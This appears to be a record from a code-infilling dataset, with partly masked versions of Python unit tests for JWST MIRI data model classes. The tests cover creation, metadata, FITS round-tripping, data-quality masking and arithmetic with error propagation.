"step-2": "<mask token>\n\n\nclass TestMiriMeasuredModel(unittest.TestCase):\n <mask token>\n <mask token>\n\n def test_creation(self):\n dq_def_names = list(MiriMeasuredModel.dq_def_names)\n schema_names = list(self.dataproduct.get_field_names('dq_def'))\n self.assertEqual(dq_def_names, schema_names,\n \"'dq_def_names' class variable does not match schema\")\n a2 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n newdp1 = MiriMeasuredModel(data=a2)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.err)\n self.assertEqual(newdp1.err.shape, newdp1.data.shape)\n self.assertAlmostEqual(np.mean(newdp1.err), 0.0)\n self.assertIsNotNone(newdp1.dq)\n self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)\n self.assertEqual(np.mean(newdp1.dq), 0)\n descr1 = str(newdp1)\n self.assertIsNotNone(descr1)\n del newdp1, descr1\n newdp2 = MiriMeasuredModel(data=a2, err=b2)\n self.assertIsNotNone(newdp2.data)\n self.assertGreater(len(newdp2.data), 0)\n self.assertIsNotNone(newdp2.err)\n self.assertEqual(newdp2.err.shape, newdp2.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)\n self.assertIsNotNone(newdp2.dq)\n self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)\n self.assertEqual(np.mean(newdp2.dq), 0)\n descr2 = str(newdp2)\n self.assertIsNotNone(descr2)\n del newdp2, descr2\n newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.err)\n self.assertEqual(newdp3.err.shape, newdp3.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)\n self.assertIsNotNone(newdp3.dq)\n self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)\n self.assertNotEqual(np.mean(newdp3.dq), 0)\n descr3 = str(newdp3)\n self.assertIsNotNone(descr3)\n del newdp3, descr3\n emptydp = MiriMeasuredModel((4, 4))\n 
self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (4, 4))\n self.assertIsNotNone(emptydp.err)\n self.assertEqual(emptydp.err.shape, (4, 4))\n self.assertIsNotNone(emptydp.dq)\n self.assertEqual(emptydp.dq.shape, (4, 4))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriMeasuredModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(a2)\n self.assertIsNotNone(nulldp.err)\n self.assertIsNotNone(nulldp.dq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n scalardp = MiriMeasuredModel(data=42)\n self.assertEqual(scalardp.data, 42)\n self.assertIsNotNone(scalardp.err)\n self.assertIsNotNone(scalardp.dq)\n descr = str(scalardp)\n self.assertIsNotNone(descr)\n del scalardp, descr\n self.assertRaises(ValueError, MiriMeasuredModel, init=[])\n self.assertRaises(ValueError, MiriMeasuredModel, init=42)\n self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name'\n )\n self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')\n self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')\n\n def test_metadata(self):\n kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n telname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.meta.telescope\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.get_fits_keyword('TELESCOP')\n self.assertEqual(telname, 'JWST')\n kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n insname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.meta.instrument.name\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.get_fits_keyword('INSTRUME')\n self.assertEqual(insname, 'MIRI')\n self.simpleproduct.add_history('History 1')\n 
self.simpleproduct.add_history('History 2')\n self.simpleproduct.add_history('History 3')\n self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)\n strg = self.simpleproduct.get_history_str()\n self.assertIsNotNone(strg)\n self.assertGreater(len(strg), 0)\n <mask token>\n <mask token>\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.simpleproduct.save(self.testfile1, overwrite=True)\n with MiriMeasuredModel(self.testfile1) as readback:\n self.assertTrue(np.allclose(self.simpleproduct.data,\n readback.data))\n del readback\n self.dataproduct.save(self.testfile2, overwrite=True)\n with MiriMeasuredModel(self.testfile2) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq'], tables='dq_def')\n del readback\n\n def test_asciiio(self):\n pass\n\n def test_masking(self):\n a2 = [[10, 999, 10, 999], [999, 10, 10, 999], [10, 10, 999, 10]]\n b2 = [[1, 99, 1, 99], [99, 1, 1, 99], [1, 1, 99, 1]]\n c2 = [[0, 1, 0, 1], [1, 0, 0, 1], [0, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2)\n meandata = np.mean(newdp.data_masked)\n self.assertGreater(meandata, 10)\n meanerr = np.mean(newdp.err_masked)\n self.assertGreater(meanerr, 1)\n newdp2 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n meandata2 = np.mean(newdp2.data_masked)\n self.assertAlmostEqual(meandata2, 10)\n meanerr2 = np.mean(newdp2.err_masked)\n self.assertAlmostEqual(meanerr2, 1)\n del newdp, newdp2\n\n def test_arithmetic(self):\n a2 = [[90, 80, 70, 60], [50, 40, 30, 20], [10, 0, -10, -20]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[0, 1, 1, 0], [0, 2, 0, 2], [1, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n newsimple = self.simpleproduct - self.simpleproduct\n self.assertAlmostEqual(newsimple.data.all(), 0.0)\n del newsimple\n result = self.dataproduct + 42\n test1 = self.dataproduct.data + 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del 
result\n result = self.dataproduct + newdp\n test1 = self.dataproduct.data + newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct - 42\n test1 = self.dataproduct.data - 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct - newdp\n test1 = self.dataproduct.data - newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct + newdp - newdp\n test1 = self.dataproduct.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * 3\n test1 = self.dataproduct.data * 3\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * newdp\n test1 = self.dataproduct.data * newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n err1 = self.dataproduct.err\n da1 = self.dataproduct.data\n err2 = newdp.err\n da2 = newdp.data\n expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1\n )\n self.assertTrue(np.array_equal(expectedErr, result.err))\n del result, da1, da2, err1, err2, expectedErr\n result = self.dataproduct / 3.0\n test1 = self.dataproduct.data / 3.0\n test2 = result.data\n 
self.assertAlmostEqual(test1.all(), test2.all())\n del test1, test2, result\n self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n result = self.dataproduct / newdp\n test1 = self.dataproduct.data / newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n dat = self.dataproduct.data[1][1]\n newdat = newdp.data[1][1]\n resultErr = result.err[1][1]\n dpErr = self.dataproduct.err[1][1]\n newdpErr = newdp.err[1][1]\n expectErr = np.sqrt(dpErr * dpErr / (newdat * newdat) + \n newdpErr * newdpErr * dat * dat / (newdat * newdat * newdat *\n newdat))\n self.assertEqual(expectErr, resultErr)\n del test1, test2, result\n newdp2 = newdp * 2\n newdp3 = newdp * 3\n newdp4 = newdp2 + newdp3\n result = (self.dataproduct - newdp) * newdp2 / newdp3 + newdp4\n del newdp, newdp2, newdp3, newdp4\n del result\n <mask token>\n\n def test_description(self):\n descr = str(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.simpleproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.err)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriRampModel(unittest.TestCase):\n\n def setUp(self):\n self.a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n self.c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.c2 = [[0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 1, 0]]\n self.acube = [self.a1, self.a1, self.a1]\n self.ccube = [self.c1, self.c2, self.c1]\n self.ahyper = 
[self.acube, self.acube]\n self.chyper = [self.ccube, self.ccube]\n self.refout = np.ones_like(self.chyper)\n self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.\n refout, pixeldq=self.c1, dq_def=pixeldq_flags, groupdq=self.\n chyper, groupdq_def=groupdq_flags)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriRampModel_test.fits'\n\n def tearDown(self):\n del self.a1, self.c1, self.c2\n del self.acube, self.ccube\n del self.ahyper, self.chyper\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n bcube = [b1, b1, b1]\n bhyper = [bcube, bcube]\n newdp1 = MiriRampModel(data=self.ahyper)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.pixeldq)\n self.assertTrue(newdp1.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp1.groupdq)\n self.assertTrue(newdp1.groupdq.ndim == 4)\n self.assertEqual(np.mean(newdp1.groupdq), 0)\n descr1 = str(newdp1)\n del newdp1, descr1\n newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.pixeldq)\n self.assertTrue(newdp3.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp3.pixeldq), 0)\n self.assertIsNotNone(newdp3.groupdq)\n 
self.assertTrue(newdp3.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp3.groupdq), 0)\n descr3 = str(newdp3)\n del newdp3, descr3\n newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)\n self.assertIsNotNone(newdp4.data)\n self.assertGreater(len(newdp4.data), 0)\n self.assertIsNotNone(newdp4.pixeldq)\n self.assertTrue(newdp4.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp4.pixeldq), 0)\n self.assertIsNotNone(newdp4.groupdq)\n self.assertTrue(newdp4.groupdq.ndim == 4)\n descr4 = str(newdp4)\n del newdp4, descr4\n newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)\n self.assertIsNotNone(newdp5.data)\n self.assertGreater(len(newdp5.data), 0)\n self.assertIsNotNone(newdp5.pixeldq)\n self.assertTrue(newdp5.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp5.groupdq)\n self.assertTrue(newdp5.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp5.groupdq), 0)\n descr5 = str(newdp5)\n del newdp5, descr5\n emptydp = MiriRampModel((2, 2, 2, 2))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (2, 2, 2, 2))\n self.assertIsNotNone(emptydp.pixeldq)\n self.assertIsNotNone(emptydp.groupdq)\n self.assertEqual(emptydp.groupdq.shape, (2, 2, 2, 2))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriRampModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(self.ahyper)\n self.assertIsNotNone(nulldp.pixeldq)\n self.assertIsNotNone(nulldp.groupdq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n a1d = [10, 20, 30, 40]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)\n a2d = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n c2d = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)\n a3d = [a2d, a2d, a2d]\n c3d = [c2d, c2d, c2d]\n self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)\n 
self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n pixeldq=self.ccube)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n groupdq=self.c1)\n\n def test_masking(self):\n self.assertIsNotNone(self.dataproduct.dq)\n mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='pixeldq')\n self.assertIsNotNone(mask1.pixeldq)\n self.assertGreater(len(mask1.pixeldq), 0)\n self.assertIsNotNone(mask1.dq)\n self.assertGreater(len(mask1.dq), 0)\n self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)\n self.assertTrue(np.all(mask1.dq == mask1.pixeldq))\n del mask1\n mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='groupdq')\n self.assertIsNotNone(mask2.groupdq)\n self.assertGreater(len(mask2.groupdq), 0)\n self.assertIsNotNone(mask2.dq)\n self.assertGreater(len(mask2.dq), 0)\n self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)\n self.assertTrue(np.all(mask2.dq == mask2.groupdq))\n del mask2\n mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n self.assertIsNotNone(mask3.pixeldq)\n self.assertGreater(len(mask3.pixeldq), 0)\n self.assertIsNotNone(mask3.groupdq)\n self.assertGreater(len(mask3.groupdq), 0)\n self.assertIsNotNone(mask3.dq)\n self.assertGreater(len(mask3.dq), 0)\n self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)\n expected = mask3.groupdq | mask3.pixeldq\n self.assertTrue(np.all(mask3.dq == expected))\n del mask3\n\n def test_arithmetic(self):\n testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n descr = str(testdp)\n self.assertIsNotNone(descr)\n del descr\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n double = testdp * 2.0\n self.assertIsNotNone(double.data)\n self.assertGreater(len(double.data), 0)\n expected = double.data * 2.0\n self.assertTrue(np.all(double.data - 
expected < 0.001))\n descr = str(double)\n self.assertIsNotNone(descr)\n del descr\n warnings.simplefilter('ignore')\n result = self.dataproduct + testdp\n self.assertIsNotNone(result.data)\n self.assertGreater(len(result.data), 0)\n self.assertIsNotNone(result.dq)\n self.assertGreater(len(result.dq), 0)\n descr = str(result)\n self.assertIsNotNone(descr)\n del descr\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriRampModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'refout', 'pixeldq', 'groupdq'], tables\n =['pixeldq_def', 'groupdq_def'])\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.refout)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriSlopeModel(unittest.TestCase):\n\n def setUp(self):\n a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n acube = [a1, a1, a1]\n bcube = [b1, b1, b1]\n ccube = [c1, c1, c1]\n dcube = [a1, b1, a1]\n self.dataproduct = MiriSlopeModel(data=acube, err=bcube, dq=ccube,\n dq_def=master_flags, zeropt=dcube, fiterr=dcube)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIMAGE', filt=\n 'F2550W', ccc_pos='OPEN', deck_temperature=11.0,\n 
detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='SLOW', nints=3,\n ngroups=10, frame_time=1.0, integration_time=100.0, group_time=\n 1000.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriSlopeModel_test.fits'\n\n def tearDown(self):\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n a1d = [10, 20, 30, 40]\n b1d = [1, 2, 3, 4]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d, dq=c1d\n )\n a2d = [a1d, a1d, a1d]\n b2d = [b1d, b1d, b1d]\n c2d = [c1d, c1d, c1d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d, dq=c2d\n )\n a3d = [a2d, a2d]\n b3d = [b2d, b2d]\n c3d = [c2d, c2d]\n a4d = [a3d, a3d]\n b4d = [b3d, b3d]\n c4d = [c3d, c3d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d, dq=c4d\n )\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq', 'nreads', 'readsat', 'ngoodseg', 'zeropt',\n 'fiterr'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriSlopeModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq', 'nreads', 'readsat',\n 'ngoodseg', 'zeropt', 'fiterr'], tables='dq_def')\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n 
descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestMiriMeasuredModel(unittest.TestCase):\n\n def setUp(self):\n self.data = np.linspace(0.0, 100000.0, 64 * 64)\n self.data.shape = [64, 64]\n self.simpleproduct = MiriMeasuredModel(data=self.data)\n self.simpleproduct.set_housekeeping_metadata('MIRI EC',\n 'Joe Bloggs', 'V1.0')\n self.simpleproduct.set_instrument_metadata(detector='MIRIMAGE',\n filt='F560W', ccc_pos='OPEN', deck_temperature=10.0,\n detector_temperature=7.0)\n self.simpleproduct.set_exposure_metadata(readpatt='SLOW', nints=1,\n ngroups=10, frame_time=30.0, integration_time=30.0, group_time=\n 300.0, reset_time=0, frame_resets=3)\n self.primary = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]\n ]\n self.error = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n self.quality = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.dataproduct = MiriMeasuredModel(data=self.primary, err=self.\n error, dq=self.quality, dq_def=master_flags)\n self.dataproduct.set_instrument_metadata(detector='MIRIFUSHORT',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile1 = 'MiriMeasuredModel_test1.fits'\n self.testfile2 = 'MiriMeasuredModel_test2.fits'\n self.tempfiles = [self.testfile1, self.testfile2]\n\n def tearDown(self):\n del self.dataproduct\n del self.primary, self.error, self.quality\n del self.simpleproduct\n del self.data\n for tempfile in self.tempfiles:\n if os.path.isfile(tempfile):\n try:\n os.remove(tempfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + tempfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n del self.tempfiles\n\n def test_creation(self):\n dq_def_names = list(MiriMeasuredModel.dq_def_names)\n schema_names = list(self.dataproduct.get_field_names('dq_def'))\n self.assertEqual(dq_def_names, schema_names,\n 
\"'dq_def_names' class variable does not match schema\")\n a2 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n newdp1 = MiriMeasuredModel(data=a2)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.err)\n self.assertEqual(newdp1.err.shape, newdp1.data.shape)\n self.assertAlmostEqual(np.mean(newdp1.err), 0.0)\n self.assertIsNotNone(newdp1.dq)\n self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)\n self.assertEqual(np.mean(newdp1.dq), 0)\n descr1 = str(newdp1)\n self.assertIsNotNone(descr1)\n del newdp1, descr1\n newdp2 = MiriMeasuredModel(data=a2, err=b2)\n self.assertIsNotNone(newdp2.data)\n self.assertGreater(len(newdp2.data), 0)\n self.assertIsNotNone(newdp2.err)\n self.assertEqual(newdp2.err.shape, newdp2.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)\n self.assertIsNotNone(newdp2.dq)\n self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)\n self.assertEqual(np.mean(newdp2.dq), 0)\n descr2 = str(newdp2)\n self.assertIsNotNone(descr2)\n del newdp2, descr2\n newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.err)\n self.assertEqual(newdp3.err.shape, newdp3.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)\n self.assertIsNotNone(newdp3.dq)\n self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)\n self.assertNotEqual(np.mean(newdp3.dq), 0)\n descr3 = str(newdp3)\n self.assertIsNotNone(descr3)\n del newdp3, descr3\n emptydp = MiriMeasuredModel((4, 4))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (4, 4))\n self.assertIsNotNone(emptydp.err)\n self.assertEqual(emptydp.err.shape, (4, 4))\n self.assertIsNotNone(emptydp.dq)\n self.assertEqual(emptydp.dq.shape, (4, 4))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, 
descr\n nulldp = MiriMeasuredModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(a2)\n self.assertIsNotNone(nulldp.err)\n self.assertIsNotNone(nulldp.dq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n scalardp = MiriMeasuredModel(data=42)\n self.assertEqual(scalardp.data, 42)\n self.assertIsNotNone(scalardp.err)\n self.assertIsNotNone(scalardp.dq)\n descr = str(scalardp)\n self.assertIsNotNone(descr)\n del scalardp, descr\n self.assertRaises(ValueError, MiriMeasuredModel, init=[])\n self.assertRaises(ValueError, MiriMeasuredModel, init=42)\n self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name'\n )\n self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')\n self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')\n\n def test_metadata(self):\n kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n telname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.meta.telescope\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.get_fits_keyword('TELESCOP')\n self.assertEqual(telname, 'JWST')\n kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n insname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.meta.instrument.name\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.get_fits_keyword('INSTRUME')\n self.assertEqual(insname, 'MIRI')\n self.simpleproduct.add_history('History 1')\n self.simpleproduct.add_history('History 2')\n self.simpleproduct.add_history('History 3')\n self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)\n strg = self.simpleproduct.get_history_str()\n self.assertIsNotNone(strg)\n self.assertGreater(len(strg), 0)\n\n def test_content(self):\n 
self.assertTrue(np.allclose(self.primary, self.dataproduct.data))\n self.assertTrue(np.allclose(self.error, self.dataproduct.err))\n self.assertTrue(np.allclose(self.quality, self.dataproduct.dq))\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.simpleproduct.save(self.testfile1, overwrite=True)\n with MiriMeasuredModel(self.testfile1) as readback:\n self.assertTrue(np.allclose(self.simpleproduct.data,\n readback.data))\n del readback\n self.dataproduct.save(self.testfile2, overwrite=True)\n with MiriMeasuredModel(self.testfile2) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq'], tables='dq_def')\n del readback\n\n def test_asciiio(self):\n pass\n\n def test_masking(self):\n a2 = [[10, 999, 10, 999], [999, 10, 10, 999], [10, 10, 999, 10]]\n b2 = [[1, 99, 1, 99], [99, 1, 1, 99], [1, 1, 99, 1]]\n c2 = [[0, 1, 0, 1], [1, 0, 0, 1], [0, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2)\n meandata = np.mean(newdp.data_masked)\n self.assertGreater(meandata, 10)\n meanerr = np.mean(newdp.err_masked)\n self.assertGreater(meanerr, 1)\n newdp2 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n meandata2 = np.mean(newdp2.data_masked)\n self.assertAlmostEqual(meandata2, 10)\n meanerr2 = np.mean(newdp2.err_masked)\n self.assertAlmostEqual(meanerr2, 1)\n del newdp, newdp2\n\n def test_arithmetic(self):\n a2 = [[90, 80, 70, 60], [50, 40, 30, 20], [10, 0, -10, -20]]\n b2 = [[1, 2, 